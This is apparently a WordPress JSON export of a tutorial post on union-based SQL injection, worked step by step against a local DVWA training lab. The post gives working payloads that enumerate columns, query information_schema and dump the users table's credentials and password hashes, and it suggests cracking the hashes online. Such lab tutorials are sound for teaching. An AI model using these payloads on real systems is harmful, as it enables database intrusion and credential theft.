{"id":234,"date":"2021-09-25T17:56:36","date_gmt":"2021-09-25T17:56:36","guid":{"rendered":"http:\/\/softwaretestingtutorials.com\/?p=234"},"modified":"2024-09-28T00:19:58","modified_gmt":"2024-09-28T00:19:58","slug":"union-based-sql-injection","status":"publish","type":"post","link":"https:\/\/www.techmaximize.com\/blog\/union-based-sql-injection\/","title":{"rendered":"UNION BASED SQL INJECTION"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote\"><p>Union based SQL injection where an attacker uses the union command to collect the information and merge it into one table. Attacker passes malicious commands and queries in the database to do so<\/p><\/blockquote>\n\n\n\n<h2>METHODS USED IN WEB APPLICATIONS<\/h2>\n\n\n\n<ul><li><strong>GET &#8211;<\/strong> It is the method used by web applications. In this type of request all the request made is sent in plain text i.e. the request is visible at the address bar. It is very insecure method as if one person is shoulder surfing he will be able to grasp your credential and this method is also helpful for several attacks.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>eg: www.aaab.com\/haha.php?id=1\n    www.adsadsa.com\/index.php?happyness=null\n<\/code><\/pre>\n\n\n\n<ul><li><strong>POST &#8211;<\/strong> The method which hides and requests the data from the Database or Server Secretly.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>eg: twitter.com\/login.php<\/code><\/pre>\n\n\n\n<h2>Union Based SQL Injection Guide Step by Step<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 1<\/strong> \nTo find the 'GET' parameter.\n             something=something\n\t\tphp?id=something\n\t\tphp?id=cat\n\t\tphp?id=1\n\t\tphp?id=query\nEither you click on some link of the web application|site or enter something in the search box.\nhttp:&#47;&#47;127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1&amp;Submit=Submit#<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 2<\/strong>\nTo generate a SQL error, to break the query.\n\t1 or 1'\nhttp:&#47;&#47;127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1'&amp;Submit=Submit#\n\nYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1\n\n\t'select * from table '\n\t'select * from table' '<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 3\n<\/strong>To count the number of columns in the web application, we will use order by\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' order by 1--+&amp;Submit=Submit#\nShows us data\nThis query means that we are asking the database to arrange the data according to column number 1\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' order by 2--+&amp;Submit=Submit#\nShows me data\nThis query means that we are asking the database to arrange the data according to column number 2\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' order by 3--+&amp;Submit=Submit#\nGives us an error - Unknown column '3' in 'order clause'\nThis query means that I am asking the database to arrange the data according to column number 3 But there is no column number 3 --> so it will generate an error\n\norder by n--+\nn starts from 1 and ends when i receive an error for the value of n\n--+ -> To comment out,\nif there is any data passed down after --+, it will not execute at all. we can also use # to comment out the rest of the content.\n\nThere are 2 columns in the database.<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 4\n<\/strong>To merge the data of all the columns, using the UNION command.\nunion select 1,2,...,n-1--+\nn=3\nunion select 1,2--+\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' union select 1,2--+&amp;Submit=Submit#\nID: 1' union select 1,2-- \nFirst name: admin\nSurname: admin\n\nID: 1' union select 1,2-- \nFirst name: 1\nSurname: 2\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' union select database(),version()--+&amp;Submit=Submit#\ndatabase() \/\/database name\nversion() \/\/Database Version Number<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 5\n<\/strong>To call database schema -> information_schema, for getting the information about the table names\nInformation_schema -> it is a meta table \/\/it contains the name of tables and columns which are present in the database.\ninformation_schema.tables \/\/It stores the name of all the table names in the database.\n\nunion select table_name,2 from information_schema.tables--+\n\t\t\tor\nunion select 1,table_name from information_schema.tables--+\n\nWe can apply both of them because both the fields are vulnerable otherwise we will go for the one which is vulnerable.\n\nhttp:\/\/127.0.0.1\/dvwa\/DVWA-1.0.8\/vulnerabilities\/sqli\/?id=1' union select 1,table_name from information_schema.tables--+&amp;Submit=Submit#<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 6\n<\/strong>I will again call database ki maa for columns names in the table names as users\n\tinformation_schema\n\tinformation_schema.columns\n\nunion select 1,column_name from information_schema.columns where table_name=\"users\"--+<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>Step 7<\/strong>\nTo retrieve or dump data from the above info.\nDVWA -> Users(User_id,first_name,Last_name,user,Password)\n\nunion select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+<\/code><\/pre>\n\n\n\n<p>Password is in hashed form so we will go online and check if the hash value of the value is available or not.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Union based SQL injection where an attacker uses the union command to collect the information and merge it<\/p>\n","protected":false},"author":1,"featured_media":249,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[27],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts\/234"}],"collection":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/comments?post=234"}],"version-history":[{"count":19,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions"}],"predecessor-version":[{"id":270,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/posts\/234\/revisions\/270"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/media\/249"}],"wp:attachment":[{"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/media?parent=234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/categories?post=234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.techmaximize.com\/blog\/wp-json\/wp\/v2\/tags?post=234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}